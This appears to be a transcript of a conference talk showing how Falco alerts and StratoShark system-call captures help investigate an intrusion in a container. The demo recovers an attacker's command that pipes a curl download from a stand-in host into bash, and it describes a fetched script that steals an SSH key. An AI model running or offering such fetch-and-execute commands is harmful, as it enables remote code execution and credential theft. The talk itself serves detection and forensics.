right, good morning, everyone. I'm Gerald Combs. I'm the creator and lead developer of Wireshark, and I'm also a Falco maintainer. And today I'm going to talk about how those tools can work together to help you detect and investigate threats in your environment. First of all, Falco is a cloud-native, real-time threat detection engine. It runs on your systems and monitors the system calls that are happening on that system. And if it detects anything sketchy, it will send you an alert. The latest release of Falco also has this really cool feature that will optionally save those system calls out to a capture file. This lets you then pivot over to a tool like StratoShark. StratoShark is based on Wireshark, if you're familiar with that. It focuses on letting you investigate system calls and log messages locally on your desktop, and I'll show that off here in a second. But both of these tools are based around a couple of libraries, libscap and libsimps. Libscap will capture system calls and through a plugin interface also capture log messages. Libsimps will then pull those up and enrich them and add contextual data, and then the applications that use those libraries can then display useful information and make use of that otherwise. As a bit of a demo, suppose you have Falco deployed in your environment and it sends you an alert. Somebody popped a shell in a container. That sounds bad, so Falco has graciously given us a process ID to work with and a process name. So let's kind of take a look at what happened. I'm going to switch over to StratoShark here and load up the capture file that Falco provided me. If you're familiar with Wireshark, this should look kind of, or if you've used Wireshark, this should look familiar, but instead of looking at packets here, we're looking at system calls. So you can see the system call name and the process name, process ID, and so on up top in the event list, and down below you can see details about the event that you have selected. I can see this very first event is bash starting up with the exec.e system call and the correct process ID. So I'm going to take that process ID field and drag it up to the filter bar here and apply this as a filter. And this shows me only the system calls that have to do with this bash process. If I scroll down, I kind of want to see what the user typed in this bash process, so I see a bunch of reads here. I know from working with this before that bash processes input one character at a time, so I'm going to go ahead and right-click on that and go down here to where it says follow Falco FD stream. This is a feature that will take all these system calls, these read system calls, and reassemble them into one stream that we can look at. And we go up here, and we can see that the user typed curl http://trust.me.bro/install.shell and pipe that into bash. That sounds terrifying. So let's figure out what happened there. I want to see what happened in that pipe. What I'm going to do now is apply a predefined filter that just shows me the sub-processes that ran under this bash process. So I've applied that. And we can see bash and curl. If I scroll down, I can see curl kind of start up and do its thing, do some network activity, and then we get out far enough, and curl kind of hands things over to bash. One of the last things curl does is write its output to a file descriptor, and that's the pipe that we're looking for. So I'm going to right-click again, follow that stream, and see what was inside that pipe. In this case, it's another bash script, prints hello, and then tries to exfiltrate a secure shell, or an SSH key. So kind of running on shorter time here, but you can kind of pivot and use StratoShark's features to investigate further and kind of drill down and see other things that happened. If you want to learn more about Falco and StratoShark, they both have their respective websites, falco.org and stratoshark.org. A couple of coworkers are going to be talking about Falco in detail tomorrow at 3:15 in this room. Finally, I just wanted to say thank you. I have had a long and brilliant career in open source, and that comes down to the communities that I work with, including all of you. So thank you very much.